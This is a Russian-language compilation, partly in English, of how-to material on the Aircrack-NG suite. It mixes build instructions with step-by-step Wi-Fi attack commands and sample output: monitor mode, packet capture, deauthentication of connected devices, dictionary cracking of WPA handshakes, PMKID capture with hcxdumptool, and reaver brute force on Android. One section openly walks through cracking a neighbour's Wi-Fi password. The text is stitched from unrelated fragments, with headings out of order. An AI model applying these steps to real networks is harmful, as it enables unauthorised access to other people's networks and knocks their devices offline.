Как пользоваться Aircrack-NG

Что это за программа

Обычно под данным названием понимается набор сетевых программ, предназначенных для обнаружения, анализа, перехвата и взлома беспроводных сетей и соответствующего сетевого трафика. С помощью инструментария, представленного в данном пакете, можно взламывать протоколы безопасности WEP и WPA/WPA2-PSK, тестировать беспроводные сети на уязвимость к внешним атакам (penetration test), проводить проверку стойкости сети и так далее.

Aircrack-NG работает с большинством популярных ОС (Виндовс, Юникс, Линукс, Мак ОС), обладая также версией для мобильных платформ (Android, Symbian, iOS).

Указанный продукт представлен в двух основных вариантах:

• Консольном (для более опытных пользователей и специалистов);
• Графическом (GUI) – удобный графический формат;

При этом работа даже с более простым GUI-вариантом предполагает предварительную подготовку пользователя. Необходимо разобраться с понятийным аппаратом, уяснить специфику алгоритмов шифрования WEP, WPA и WPA2, ознакомиться с вспомогательными программами, которые помогут нам во взломе (к примеру, с комплементарным приложением CommView) и так далее. В статье я расскажу об использовании расшифровщика перехваченного трафика Aircrack-NG.

Предупреждение! автор за последствия ответственность не несет, все что вы делаете вы делаете на свой страх и риск.

Все что я делал, я делал на Android ICS 4.0.4 (будет ли это работать на других — не знаю, но думаю на 4.x.x должно).

Aircrack-ng

Aircrack-ng is a complete suite of tools to assess WiFi network security.

It focuses on different areas of WiFi security:

• Monitoring: Packet capture and export of data to text files for further processing by third party tools.
• Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
• Testing: Checking WiFi cards and driver capabilities (capture and injection).
• Cracking: WEP and WPA PSK (WPA 1 and 2).

All tools are command line which allows for heavy scripting. A lot of GUIs have taken advantage of this feature. It works primarily on Linux but also Windows, macOS, FreeBSD, OpenBSD, NetBSD, as well as Solaris and even eComStation 2.

Airmon-ng: режим мониторинга

Теперь необходимо перевести беспроводной сетевой интерфейс в режим мониторинга.Режим мониторинга позволяет компьютеру с беспроводным сетевым интерфейсом мониторить весь трафик в беспроводной сети.

Что особенно для нас важно, так это то, что режим мониторинга позволяет перехватывать все передающиеся пакеты без непосредственного подключения к какому-либо WiFi роутеру.

Найдите и остановите все процессы, которые могут помешать:

$ sudo airmon-ng check kill

Запустите беспроводной интерфейс в режиме мониторинга:

$ sudo airmon-ng start wlan0 Interface Chipset Driver wlan0 Intel 6235 iwlwifi — [phy0] (monitor mode enabled on mon0)

В приведенном выше примере, airmon-ng создал новый беспроводной интерфейс mon0 и переключил его в режим мониторинга.

Таким образом, mon0 — это правильное имя интерфейса, которое мы будем использовать далее в этом руководстве.

Alpine

sudo apk add gcc g make autoconf automake libtool libnl3-dev openssl-dev ethtool libpcap-dev cmocka-dev hostapd wpa_supplicant tcpdump screen iw pkgconf util-linux sqlite-dev pcre-dev linux-headers zlib-dev pciutils usbutils

Note: Community repository needs to be enabled for iw

Arch linux

sudo pacman -Sy base-devel libnl openssl ethtool util-linux zlib libpcap sqlite pcre hwloc cmocka hostapd wpa_supplicant tcpdump screen iw usbutils pciutils`

Centos/rhel 7

sudo yum install epel-release
sudo ./centos_autotools.sh
# Remove older installation of automake/autoconf
sudo yum remove autoconf automake
sudo yum install sqlite-devel openssl-devel libpcap-devel pcre-devel rfkill libnl3-devel ethtool hwloc-devel libcmocka-devel make file expect hostapd wpa_supplicant iw usbutils tcpdump screen zlib-devel

Note: autoconf, automake, libtool, and pkgconfig in the repositories are too old. The script centos_autotools.sh automatically installs dependencies to compile then install the tools.

Centos/rhel 8

sudo yum config-manager --set-enabled powertools
sudo yum install epel-release
sudo yum install libtool pkgconfig sqlite-devel autoconf automake openssl-devel libpcap-devel pcre-devel rfkill libnl3-devel gcc gcc-c ethtool hwloc-devel libcmocka-devel make file expect hostapd wpa_supplicant iw usbutils tcpdump screen zlib-devel

Clear linux

Note: hostapd must be compiled manually, it is not present in the repository

Compiling

To build aircrack-ng, the Autotools build system is utilized. Autotools replaces
the older method of compilation.

NOTE: If utilizing a developer version, eg: one checked out from source control,
you will need to run a pre-configure script. The script to use is one of the
following: autoreconf -i or env NOCONFIGURE=1 ./autogen.sh.

First, ./configure the project for building with the appropriate options specified
for your environment:

TIP: If the above fails, please see above about developer source control versions.

Next, compile the project (respecting if make or gmake is needed):

• Compilation:

  make

• Compilation on *BSD or Solaris:

  gmake

Finally, the additional targets listed below may be of use in your environment:

• Execute all unit testing:

  make check

• Execute all integration testing (requires root):

  make integration

• Installing:

  make install

• Uninstall:

  make uninstall

Cygwin

Cygwin requires the full path to the setup.exe utility, in order to
automate the installation of the necessary packages. In addition, it
requires the location of your installation, a path to the cached
packages download location, and a mirror URL.

An example of automatically installing all the dependencies
is as follows:

Debian/ubuntu

sudo apt-get install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils

Documentation

Some more information is present in the README file.

Dragonflybsd

pkg install pkgconf shtool libtool gcc8 automake autoconf pcre sqlite3 libgcrypt gmake cmocka

Fedora

sudo yum install libtool pkgconfig sqlite-devel autoconf automake openssl-devel libpcap-devel pcre-devel rfkill libnl3-devel gcc gcc-c ethtool hwloc-devel libcmocka-devel make file expect hostapd wpa_supplicant iw usbutils tcpdump screen zlib-devel

Freebsd

pkg install pkgconf shtool libtool gcc9 automake autoconf pcre sqlite3 openssl gmake hwloc cmocka

Kali linux nethunter — почувствуйте себя хакером

Kali Linux Nethunter является первой в своем роде платформой для работы с Wi-Fi под Android с открытым исходным кодом. Используя это приложение, интерфейс которого, к сожалению, сложно назвать простым и понятным, можно получить полный доступ к беспроводным сетям и даже узнать некоторую информацию об устройствах, которые подключены к Wi-Fi.

Linux/bsd

Aircrack-ng is available in most distributions repositories. However, it is not always up to date.

We provide up to date versions via PackageCloud for a number of Linux distributions:

Macos

XCode, Xcode command line tools and HomeBrew are required.

brew install autoconf automake libtool openssl shtool pkg-config hwloc pcre sqlite3 libpcap cmocka

Mageia

sudo urpmi autoconf automake libtool pkgconfig libnl3-devel libopenssl-devel zlib-devel libpcap-devel sqlite3-devel pcre-devel hwloc-devel libcmocka-devel hostapd wpa_supplicant tcpdump screen iw gcc-c gcc make

Msys2

pacman -Sy autoconf automake-wrapper libtool msys2-w32api-headers msys2-w32api-runtime gcc pkg-config git python openssl-devel openssl libopenssl msys2-runtime-devel gcc binutils make pcre-devel libsqlite-devel

Openbsd

pkg_add pkgconf shtool libtool gcc automake autoconf pcre sqlite3 openssl gmake cmocka

Opensuse

sudo zypper install autoconf automake libtool pkg-config libnl3-devel libopenssl-1_1-devel zlib-devel libpcap-devel sqlite3-devel pcre-devel hwloc-devel libcmocka-devel hostapd wpa_supplicant tcpdump screen iw gcc-c gcc ethtool pciutils usbutils

Optional stuff

• If you want SSID filtering with regular expression in airodump-ng
  (-essid-regex) PCRE development package is required.
• If you want to use airolib-ng and ‘-r’ option in aircrack-ng,
  SQLite development package >= 3.3.17 (3.6.X version or better is recommended)
• If you want to use Airpcap, the ‘developer’ directory from the CD/ISO/SDK is required.
• In order to build besside-ng, besside-ng-crawler, easside-ng, tkiptun-ng and wesside-ng,
  libpcap development package is required (on Cygwin, use the Airpcap SDK instead; see above)
• rfkill
• If you want Airodump-ng to log GPS coordinates, gpsd is needed
• For best performance on SMP machines, ensure the hwloc library and headers are installed. It is strongly recommended on high core count systems, it may give a serious speed boost
• CMocka for unit testing
• For integration testing on Linux only: tcpdump, HostAPd, WPA Supplicant and screen

Packaging

Automatic detection of CPU optimization is done at run time. This behavior
is desirable when packaging Aircrack-ng (for a Linux or other distribution.)

Also, in some cases it may be desired to provide your own flags completely and
not having the suite auto-detect a number of optimizations. To do this, add
the additional flag —without-opt to the ./configure line:

./configure —without-opt

Requirements

• Autoconf
• Automake
• Libtool
• shtool
• OpenSSL development package or libgcrypt development package.
• Airmon-ng (Linux) requires ethtool, usbutils, and often pciutils.
• On Windows, cygwin has to be used and it also requires w32api package.
• On Windows, if using clang, libiconv and libiconv-devel
• Linux: LibNetlink 1 or 3. It can be disabled by passing —disable-libnl to configure.
• pkg-config (pkgconf on FreeBSD)
• FreeBSD, OpenBSD, NetBSD, Solaris and OS X with Macports: gmake
• Linux/Cygwin: make and Standard C Library development package (Debian: libstdc -dev)

Note: Airmon-ng only requires pciutils if the system has a PCI/PCIe bus and it is populated.
Such bus can be present even if not physically visible. For example, it is present,
and populated on the Raspberry Pi 4, therefore pciutils is required on that device.

Shark for root — поиск уязвимостей в беспроводных сетях

Shark For Root — это Android-версия популярного пакета Wireshark с открытым исходным кодом, который обычно используется для анализа сетевого трафика и разработки протоколов безопасности. Обратите внимание, что вам понадобится Wireshark на вашем настольном компьютере, чтобы начать работу, так как приложение на смартфоне работает в паре со «старшим братом», дополняя его функциональность.

Step 2: scan for available wifis

Use airodump-ng to scan for available WiFis with their BSSID and ESSID.

# airodump-ng wlan0mon

Output:

Step 3: generate the traffic that will be used

Capture traffic on wlan0mon using airodump-ng command. The captured traffic will be the one to be used by Aircrack-ng to try and crack the WiFis WEP and WPA-PSK keys hence revealing the WiFis passwords in clear text. The whole point is to capture the Authentication packets.

# airodump-ng -w capture1 — output-format pcap — bssid 7C:C3:85:DA:2D:5E — channel 1 wlan0mon

Output:

17:02:22 Created capture file “capture1–01.cap”.CH 1 ][ Elapsed: 10 mins ][ 2020–06–25 17:12 ][ fixed channel wlan0mon: 7BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID7C:C3:85:DA:2D:5E -41 66 3360 2167 9 3 130 WPA2 CCMP PSK Home-WiFiBSSID STATION PWR Rate Lost Frames Notes Probes7C:C3:85:DA:2D:5E 0C:96:E6:30:5C:BB -33 0e- 1 26 7212 EAPOL7C:C3:85:DA:2D:5E DC:29:19:6F:9A:80 -52 0e- 0e 0 1523

The output of the above command will show the Mac Addresses of WiFi Network(s) under BSSID and associated connected Device(s) under STATION.

For this guide I will be using the STATION or rather the device 0C:96:E6:30:5C:BB, which is a laptop connected to my home WiFi (Home-WiFi ).

Step 4: deauthenticate a connected device

In order to capture Authentication packets, ideally you will have to wait for a Device to connect to the WiFi using the correct credentials which might be a long shot. A quick way will be to DeAuthenticate an already connected Device in the hopes that it will be reconnected.

Use Aireplay-ng command to send DeAuth packets to one of the connected stations.

As indicated earlier, I will be deauthenticating the device 0C:96:E6:30:5C:BB.

# aireplay-ng -0 10 -a 7C:C3:85:DA:2D:5E -c 0C:96:E6:30:5C:BB wlan0mon-

You might need to run the command severally in order to successfully deauthenticate a station and disconnect it from the WiFi as it will try on different channels. To have successfully deauthenticate a station yo get output similar to the one below:

17:08:04 Waiting for beacon frame (BSSID: 7C:C3:85:DA:2D:5E) on channel 317:08:04 Sending 64 directed DeAuth (code 7). STMAC: [0C:96:E6:30:5C:BB] [ 2| 7 ACKs]17:08:05 Sending 64 directed DeAuth (code 7). STMAC: [0C:96:E6:30:5C:BB] [ 0| 3 ACKs]17:08:06 Sending 64 directed DeAuth (code 7). STMAC: [0C:96:E6:30:5C:BB] [ 0| 0 ACKs]17:08:06 Sending 64 directed DeAuth (code 7). STMAC: [0C:96:E6:30:5C:BB] [ 0| 0 ACKs]17:08:07 Sending 64 directed DeAuth (code 7). STMAC: [0C:96:E6:30:5C:BB] [ 0|17 ACKs]17:08:07 Sending 64 directed DeAuth (code 7). STMAC: [0C:96:E6:30:5C:BB] [ 0|32 ACKs]17:08:08 Sending 64 directed DeAuth (code 7). STMAC: [0C:96:E6:30:5C:BB] [ 0| 2 ACKs]17:08:08 Sending 64 directed DeAuth (code 7). STMAC: [0C:96:E6:30:5C:BB] [ 0| 1 ACKs]17:08:09 Sending 64 directed DeAuth (code 7). STMAC: [0C:96:E6:30:5C:BB] [ 0| 0 ACKs]17:08:10 Sending 64 directed DeAuth (code 7). STMAC: [0C:96:E6:30:5C:BB] [ 0| 0 ACKs]

From the laptop with the Mac address of 0C:96:E6:30:5C:BB it got disconnected from the WiFi as seen in the prompt below:

Some devices are set to authenticate automatically to given WiFi networks so they might not be prompted to authenticate back but the devices actually get kicked out of the WiFi network but they connect back

I reconnected the laptop by providing the WiFi password. Ideally if you check the output of the command airodump-ng wlan0mon in step 2 you will see the output WPA handshake: 70:4F:57:C1:52:06 which indicates that a successful WPA handshake which shows that a device connected to the WiFI with correct credentials. In my case this happened by reconnecting the laptop to the WiFi.

This means that for this particular process of cracking the WiFis WEP and WPA-PSK keys to get the WiFi passwords to work, it will depend on a device being reconnected to the WiFi after you have successfully deauthenticated it from the WiFi network or being lucky and a device is connected to the WiFi network while you are capturing the traffic on that particular WiFi BSSID as illustrated earlier.

Step 5: crack the wifis wep and wpa-psk

Now comes the step where will crack the WiFis WEP and WPA-PSK keys to get the WiFi password in clear text using Aircrack-ng. For this to work you will use a wordlist. Here comes another huddle, the password ideally should be in the wordlist in order for you to decipher the password in plain text. At first I used the default wordlist found on /usr/share/onionshare/wordlist.txt.

# aircrack-ng -a2 -b 7C:C3:85:DA:2D:5E -w /usr/share/onionshare/wordlist.txt capture1–01.cap

Output:

Aircrack-ng 1.6[00:00:03] 7637/7777 keys tested (2758.38 k/s)Time left: 0 seconds 98.20%Current passphrase: oakMaster Key : 24 85 19 0B 8F 8C 6E 32 B3 6A 2A 88 74 88 25 34D8 13 CF 59 45 A7 86 28 10 5F 6E 9A 0F 56 D5 FETransient Key : CF 8D AA 50 04 1C CB B0 DE 4A 1D 64 BD FA 1C 87B7 75 F8 5E 1B CB 63 E9 28 A5 E8 A4 5F FE 71 2BAC DD 5D C9 E5 4A 6F 0F 95 6B 29 13 90 FC 9D F0B2 31 6E 5B FD A5 2F 12 27 B9 7E 49 68 55 02 B2EAPOL HMAC : 91 41 22 E7 40 01 BB 62 33 42 0A 70 F1 FE 1C 09

The above command will test against each passphrase available on the wordlist till it finds a match or not.

Of course my WiFi password is complex, it was not available on the wordlist I provided:

Current passphrase: connect

KEY NOT FOUND00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00EAPOL HMAC : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

For the purpose of this guide, to simulate a situation where the passphrase was indeed in the wordlist, I appended my WiFi password to the wordlist:

Usage

1. Clone this repository to your working folder:

2. After cloning this repository, open the folder inside VS Code.

IMPORTANT: You should answer «Yes», if it asks if the folder should be opened inside a remote container. If it does not ask, then press Ctrl Shift P and type open in container. This should bring up the correct command, for which pressing enter will run said command.

3. A number of warnings might appear about a missing compile_commands.json file. These are safe to ignore for a moment, as this file is automatically generated after the initial compilation.
4. Now build the entire project by pressing Ctrl R and selecting Build Full from the pop-up menu that appears.
5. VS Code should detect the compile_commands.json file and ask if it should be used; selecting «Yes, always» will complete the initial setup of a fully working IDE.

IMPORTANT: If it doesn’t detect the file, pressing Ctrl Shift P and typing reload window will bring up the selection to fully reload the environment.

6. At this point, nearly all features of VS Code will function; from Intellisense, auto-completion, live documentation, to code formatting. Additionally, there are pre-configured tasks for builds and tests, as well as an example GDB/LLDB configuration for debugging aircrack-ng.

Vs code — devcontainers

A VS Code development environment is provided, as is, for rapid setup of a development environment. This additionally adds support for GitHub Codespaces.

Windows

• Install the appropriate «monitor» driver for your card; standard drivers don’t work for capturing data.
• Aircrack-ng suite is command line tools. So, you have to open a command-line
  Start menu -> Run... -> cmd.exe then use them
• Run the executables without any parameters to have help

Атака на pmkid в aircrack-ng

В вышедшей новой версии Aircrack-ng 1.4 (от 29 сентября 2021 года) добавлена возможность взлома PMKID. Правда, в Airodump-ng не добавлено каких-либо специальных функций по захвату именно PMKID. Но, по идее, это не должно стать серьёзной проблемой, поскольку PMKID содержится в первом сообщении рукопожатия поэтому, я надеюсь, нам удастся захватить PMKID в Airodump-ng.

Взлом pmkid в aircrack-ng

Начнём с захвата фреймов с помощью hcxdumptool. Больше подробностей в этой статье, здесь же только кратко сами команды.

Смотрим имя интерфейса и идентификаторы процессов, которые могут помещать

sudo hcxdumptool -I

С помощью команды kill завершаем процессы, которые могут помешать.

sudo kill XXXX XXXX

Переводим интерфейс в режим монитора:

sudo ip link set <интерфейс> down
sudo iw dev <интерфейс> set monitor control
sudo ip link set <интерфейс> up

Я использую Wi-Fi интерфейс wlp0s20f0u1, а данные сохраняю в файл test.pcapng:

sudo hcxdumptool -o test.pcapng -i wlp0s20f0u1 --enable_status 15

Получен файл test.pcapng, этот файл в формате pcapng — а aircrack-ng не понимает этот формат, поэтому конвертируем его в pcap:

tcpdump -r test.pcapng -w test.pcap

Будет создан новый файл test.pcap, анализируем его с помощью aircrack-ng:

aircrack-ng test.pcap

Поскольку этот файл захвачен в «шумных» условиях, то там много разных фреймов и фрагментов рукопожатий, нас интересуют сети, напротив которых есть надпись «WPA (0 handshake, with PMKID)»:

Для взлома с помощью aircrack-ng используем команду вида:

aircrack-ng -w путь_до_словаря файл_захвата.pcap

В моём случае:

aircrack-ng -w test.dic test.pcap

Здесь:

• -w test.dic — словарь для брут-форса
• test.pcap — файл захвата с фреймами

Я буду брут-форсить пароль для Wi-Fi сети Paangoon_2G, указываю её номер:

У меня крошечный тестовый словарик, поэтому я сразу взломал пароль Wi-Fi, об этом свидетельствует надпись «KEY FOUND!»:

Подробности о взломе паролей в Aircrack-ng, а также о том, как запускать атаки по маске, по словарю и в паре с различными генераторами паролей, читайте в статье «Взлом WPA/WPA2 паролей с Aircrack-ng: перебор по словарю, совместная работа с Hashcat, maskprocessor, statsprocessor, John the Ripper, Crunch, взлом в Windows».

Видео инструкция использования программы

Рассмотрев вопрос о том, как работать с Aircrack-NG, обращаем внимание читателя, что полноценное использование указанного продукта, который, de facto, работает на принципах брутфорса, невозможно без дополняющих его функционал сторонних программ (уровня «CommView for WiFi»).

Дисклеймер

Автор материала не несет ответственности за действия, совершенные третьими лицами. Данный материал предоставлен исключительно для ознакомления и не является призывом к действию.

В этой статье мы рассмотрим лучшее в мире программное обеспечение для взлома Wi-Fi aircrack-ng. Мы будем использовать aircrack-ng практически во всех последующих атаках, поэтому я думаю, что было бы разумно начать с некоторых основ того, что включено и как все использовать.

Для этого нам понадобится совместимый адаптер беспроводной сети. Ознакомьтесь с самым популярным адаптером для начинающих здесь.

Во-первых, aircrack-ng — это не отдельный инструмент, а набор инструментов для манипулирования и взлома сетей Wi-Fi. В этом наборе есть инструмент aircrack для взлома паролей. Кроме того, aircrack-ng способен выполнять DOS-атаки, поднимать мошеннические точки и многое другое.

Итак, начнем с пакета aircrack-ng!

ng означает новое поколение , так как aircrack-ng заменяет старый под названием aircrack, который больше не поддерживаются.

Запуск aircrack-ng и reaver на android

Когда нечего делать или как я устанавливал aircrack и reaver на android. Я подумал а не попробовать ли мне установить kali-linux на android через linux installer, но затем передумал и решил просто установить reaver и aircrack на телефон. Но тут возник вопрос как перевести WiFi в режим монитора.

В интернете про запуск reaver’a и aircrack’a под android’om информации мало, в основном на XDA-Developers. Исходя из того что я вычитал из XDA для того чтобы как перевести WiFi в режим монитора нужно компилировать/ставить на телефон кастомные драйвера для WiFi, которые, к тому же, не факт что будут работать… Ну в общем ничего хорошего я там не вычитал, разве что нашел reaver скомпилированный под android. А вот с aircrack’om вышла проблема, его я искал долго и нудно, но нашел статическую версию для armel. Итак пол дела сделано, осталось разобраться с режимом монитора. Опять же на XDA была статья про это, но там требовалось ставить кастомные драйвера и по моему ядро. Я подумал что это слишком, подумал может как нибудь получится без этого. Запустил на телефоне эмулятор терминала и начал колупать. В итоге выяснил что и драйвера и адаптер режим монитора поддерживают, но перевести адаптер в этот самый режим оказалось не так просто. Но добрый гугл мне помог разобратсья с этой проблемой. Итак уже почти все готово. Запускаем airodump-ng

О чудо он работает. Ну впрочем теперь можно и reaver

попробовать запустить:

Неужели и он работает? Но в каждой бочке мёда есть своя ложка дегтя:

Из выше расположенного скриншота видно что скорость перебора ключей reaver’om 7 секунд на ключ, это конечно прискорбно. Ждать пока он подберет пароль к роутеру было бы неразумно, поэтому я и не стал. Испытуемым был SE Xperia Mini, но на более новых более мощных телефонах, думаю, процесс пойдет быстрее.

Запускаем airodump

netcfg mon0 up cd /путь/к/бинарникам/airodump ./airodump -i mon0

Для остановки необходимо нажать Ctrl C (Уменьшить громкость, затем C на англ. раскладке — справедливо для Android Terminal Emulator).

Запускаем reaver

cd /путь/к/бинарникам/reaver ./reaver -i mon0 -b 11:22:33:44:55:66 -vv

11:22:33:44:55:66 как вы поняли нужно заменить на BSSID необходимой сети

Для остановки необходимо нажать Ctrl C (Уменьшить громкость, затем C на англ. раскладке — справедливо для Android Terminal Emulator).

Захват pmkid в airodump-ng

Теперь попробуем захватить PMKID с помощью Airodump-ng. Напомню, что PMKID содержится в первом сообщении рукопожатия, это сообщение Точка Доступа отправляет в ответ на ассоциацию с ней.

Нам нужно узнать, на каком канале работает целевая ТД, а также её BSSID (MAC-адрес). Для обзора эфира мы запускаем airodump-ng:

sudo airodump-ng wlp0s20f0u1

Меня интересует беспроводная сеть Paangoon_2G, она работает на канале 9 и её MAC-адрес 40:3D:EC:C2:72:B8.

Вновь запускаем airodump-ng, с опцией —channel указываем желаемый канал, а с опцией -w указываем файл для записи захваченных радио фреймов:

sudo airodump-ng wlp0s20f0u1 --channel 9 -w cap2

Теперь нужно ассоциироваться с точкой доступа. Для этого я пробовал использовать aireplay-ng, но эта программа поддерживает ассоциацию только для WEP и не работает с WPA (ошибка Denied (code 12), wrong ESSID or WPA).

Ассоциация происходит естественным образом при попытке подключиться к этой точки доступа, то есть с другой беспроводной карты можно начать подключение к точке доступа и в этом случае действительно удаётся захватить PMKID, правда вместе с рукопожатием. Об этом говорит строка «WPA (1 handshake, with PMKID)».

Можно подключиться, например, через Network Manager или с помощью другого компьютера или телефона, пароль можно указать любой. Для подключения из командной строки, создайте конфигурационный файл (замените данные на свои):

wpa_passphrase "Paangoon_2G" 22222222 > Paangoon_2G.conf

Здесь:

• «Paangoon_2G» — имя интересующей меня сети
• 22222222 — произвольный пароль (не менее 8 символов)
• Paangoon_2G.conf — имя конфигурационного файла.

Для подключения выполните:

sudo wpa_supplicant -i wlo1 -c Paangoon_2G.conf -d

Здесь:

• -i wlo1 — имя беспроводного интерфейса, используемого для подключения
• -c Paangoon_2G.conf — используемый для подключения конфигурационный файл
• -d — опция, включающая показ сообщений отладки

Анализ полученного файла:

aircrack-ng cap2-01.cap

Для извлечения PMKID (чтобы для брутфорса не использовался хендшейк с заведомо неверным паролем), откроем этот файл в Wireshark:

wireshark-gtk cap2-01.cap

Для отделения только нужных данных, используем следующий фильтр (замените 40:3D:EC:C2:72:B8 на интересующую вас точку доступа):

(wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x05 || (eapol && wlan.rsn.ie.pmkid)) && wlan.addr==40:3D:EC:C2:72:B8

Загляните в первое сообщение рукопожатия и убедитесь, что там действительно присутствует PMKID:

Теперь с помощью CTRL m выделите нужные пакеты (Beacon и Message 1):

И в меню File выберите Export Specified Packets. Введите имя файла и поставьте переключатель на Marked packets only. Если вам непонятно, как сохранять отдельные фреймы, то смотрите статью «Как извлечь рукопожатия из файла захвата с несколькими рукопожатиями», там имеются дополнительные скриншоты.

Я сохранил эти два фрейма в файл extracted.pcap, проверяю файл:

aircrack-ng extracted.pcap

Отлично: хендшейков — 0, зато есть PMKID, об этом говорит уже знакомая нам строка «WPA (0 handshake, with PMKID)».

Можно вновь запустить тестовый взлом:

aircrack-ng -w test.dic extracted.pcap

Вновь пароль успешно взломан:

Инструкция:

Вдруг кому то пригодится.

Итак приступим

Тут есть два варианта:

1. Скопировать утилиты на SD карту и перемонтировать ее для выполнения;
2. Перемонтировать /system для записи и скинуть туда.

Я выбрал второй способ.Далее нам надо запустить WiFi в режиме монитора (пока будет запущен монитор WiFi будет немного нестабилен). Для начала нужно создать экземпляр монитора, для этого заходим в терминал и пишем:

su iw phy0 interface add mon0 type monitor

mon0 можно заменить на любое другое имя

В результате получим что-то вроде этого:

Если набрать netcfg

увидим следующее:

Где wlan0 и mon0 это именно то что нам нужно.

Для работы монитора WiFi должен быть включен в настройках телефона

Осталась самая малость.

Как задействовать aircrack-ng для взлома пароль к wi-fi

Разберём на простом примере алгоритм взлома пароля соседской вай-фай сети, которая зашифрована протоколом WPA (ныне наиболее популярен) используя Эйркрек-НГ. Для этого выполните следующее:

1. Запустите программу, перейдите в первую вкладку «Aircrack-ng»;
2. В строке «Filenames» указываем путь к файлу дампа с перехваченными пакетами (данный файл можно получить, использовав, к примеру, программу «CommView for WiFi»);
3. В «Encryption» (шифрование) выбираем «WPA»;
4. В строке «Wordlist» указываем путь к файлу, содержащему огромную базу вариантов паролей (его можно поискать в сети);
5. Ставим галочку в «Advanced option» (Дополнительные опции);
6. Ставим галочку в «Specify ESSID» и указываем там имя взламываемой нами Wi-Fi сети;
7. Теперь ставим галочку в «Specify BSSID», и в открывшейся строке указываем MAC-адрес сети (с ним поможет та же «CommView for WiFi», во вкладке «Узлы» которой необходимо кликнуть правой клавишей мыши на нужной нам сети и выбрать в появившемся меню «Копировать MAC-адрес»);
8. Затем кликаем на кнопку «Launch» (запуск) внизу и ждём нахождения правильного пароля. В зависимости от сложности пароля время поиска может занять от нескольких минут до 5-10 часов (а то и более).

Надеюсь вы поняли как пользоваться программой, и сумели взломать точку доступа.

Как пользоваться aircrack-ng

В глобальной сети Интернет можно найти множество инструкций, которые или помогут вам освоить этот инструмент, либо насовсем отобьют «охоту». Мы решили не запутывать вас длинными пространными речами, а собрали небольшое универсальное руководство. Надеемся, оно вам поможет.

Новая атака на wi-fi без клиентов

Имеется большое количество разнообразных атак на Wi-Fi. Самой универсальной атакой (работающей в отношении практически всех точек доступа) является атака на технологию WPA/WPA2, поскольку именно она применяется в подавляющем большинстве беспроводных точек доступа.

WPA/WPA2 при подключении клиентов к точке доступа используют протокол безопасности EAPOL, во время которого происходит поэтапный обмен данными между точкой доступом и клиентом, который хочет подключиться. Суть атаки заключается в том, что необходимо перехватить полностью (или хотя бы часть) передаваемые данные и методом перебора найти подходящий пароль. Проще говоря, сначала нужно захватить рукопожатие (на этапе EAPOL), а затем с помощью брут-форса найти правильный пароль.

На каждом из этих двух этапов могут возникнуть трудности: проблемы с захватом рукопожатия могут быть вызваны множеством причин, самой фатальной из них является отсутствие клиентов. То есть если нет подключающихся клиентов, значит не используется протокол EAPOL, значит нечего перехватывать.

Подробности об атаке

RSN IE — это опциональное поле, которое может быть найдено в управляющих 802.11 фреймах. Одной из возможностей RSN является PMKID.

Пример RSN PMKID в первом сообщении рукопожатия:

Ещё один пример:

И ещё:

PMKID вычисляется с использованием HMAC-SHA1 где в качестве ключа используется PMK (пароль от Wi-Fi), другая часть данных — это объединение фиксированной строки метки «PMK Name», MAC адрес точки доступа и MAC адрес станции.

Формула вычисления такая:

PMKID = HMAC-SHA1-128(PMK, «PMK Name» | MAC_AP | MAC_STA)

Поскольку PMK (пароль Wi-Fi) здесь тот же самый, что и в обычном четырёхстороннем EAPOL рукопожатии, то это идеальный вектор для атаки.

И обратите внимание, что все нужные нам данные мы получаем в ПЕРВОМ кадре EAPOL, который Точки Доступа отправляют сами кому угодно.

Послесловие

Перебирает reaver конечно медленно, но возможно на более новых мощных телефонах процесс пойдет быстрее. А также кроме reaver’a имеются airbase-ng, aircrack-ng, airdecap-ng, airdecloak-ng, aireplay-ng, airodump-ng, airserv-ng, airtun-ng, besside-ng, besside-ng-crawler, packetforge-ng, wash может кому пригодятся.А также хочу предупредить что…

• … reaver работает немного нестабильно, порой не хочет подключатся к сети.
• … монитор нужно выключать иначе будут проблемы с подключением к сетям. su netcfg mon0 down
• … после перезапуска телефона монитор mon0 будет удален и его придется создавать заново.

UPD: Для тех у кого нет iw, его можно взять тут Для тех у кого нет ifconfig нужно установить busybox Для тех, у кого нет iwconfig, его можно найти тут

Пример атаки «без клиентов» на wi-fi

Начнём со следующей команды:

sudo hcxdumptool -I

Этой командой мы получаем список wlan интерфейсов:

• c0b6f9daaf3e wlo1 (iwlwifi)
• 00c0ca900d9f wlp0s20f0u1 (rt2800usb)

А также два предупреждения:

• warning: NetworkManager is running with pid 578
• warning: wpa_supplicant is running with pid 1190

Они означают, что в данный момент работают программы NetworkManager и wpa_supplicant с идентификаторами процессов 578 и 1190 соответственно. Чтобы не было проблем, нужно завершить эти программы. Это можно сделать командой kill, после которой укажите pid процессов (поменяйте данные на свои):

sudo kill 578 1190

По идее, не нужно переводить Wi-Fi карту в режим монитора — hcxdumptool должна сделать это за нас, но если при следующей команде вы получите сообщения:

interface is not up
failed to init socket

значит переведите беспроводной интерфейс в режим монитора вручную командами вида:

sudo ip link set <интерфейс> down
sudo iw dev <интерфейс> set monitor control
sudo ip link set <интерфейс> up

Например, я хочу использовать интерфейс wlp0s20f0u1, тогда мои команды выглядят так:

sudo ip link set wlp0s20f0u1 down
sudo iw dev wlp0s20f0u1 set monitor control
sudo ip link set wlp0s20f0u1 up

Запускаем hcxdumptool для запроса PMKID от ТД и сохранения полученных кадров в формат pcapng:

sudo hcxdumptool -o test.pcapng -i wlp0s20f0u1 --enable_status 15

В предыдущей команде:

Приведённая выше команда пытается собрать данные со всех точек доступа, находящихся в радиусе досягаемости, причём используется как «без клиентская атака», так и классическая атака с деаутентификацией. Если вы хотите собирать PMKID без параллельного выполнения атаки деаутентификация, то используйте дополнительно опцию —disable_deauthentications.

Как уже было сказано, по умолчанию атакуются все Точки Доступа, если вы хотите атаковать только некоторые или исключительно одну, то используйте опцию —filterlist_ap=<файл>, где в качестве <файла> укажите список MAC-адресов (по одному на строку).

